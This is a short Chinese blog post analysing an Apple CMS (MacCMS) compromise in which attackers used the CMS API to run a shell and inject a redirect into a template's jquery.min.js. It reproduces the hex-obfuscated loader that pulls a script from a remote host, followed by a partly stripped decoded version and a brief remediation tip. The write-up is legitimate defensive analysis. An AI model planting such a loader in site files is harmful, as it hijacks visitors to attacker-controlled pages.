苹果cms最新漏洞被挂马跳转劫持及清除代码

编程入门 行业动态 更新时间:2024-10-20 03:22:52

苹果cms最新漏洞被挂马<a href=https://www.elefans.com/category/jswz/34/1769274.html style=跳转劫持及清除代码"/>

苹果cms最新漏洞被挂马跳转劫持及清除代码

网站被挂马跳转劫持跳转到H APP下载页。

被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。

挂马图片

通过日志查看挂马过程

该漏洞是利用苹果CMS的API执行SHELL,

挂马文件在模板的jquery.min.js

;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73’;head.appendChild(script);
解密之后是

var head = document.getElementsByTagName(‘head’)[0];
var script = document.createElement(‘script’);
script[‘src’] = ‘.js’;
head.appendChild(script);
清除代码

关闭后台采集API功能。或自定义API接口名字,
欢迎关注我的网站

更多推荐

苹果cms最新漏洞被挂马跳转劫持及清除代码

本文发布于:2024-02-05 10:11:49,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1744858.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:跳转   漏洞   苹果   代码   最新

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!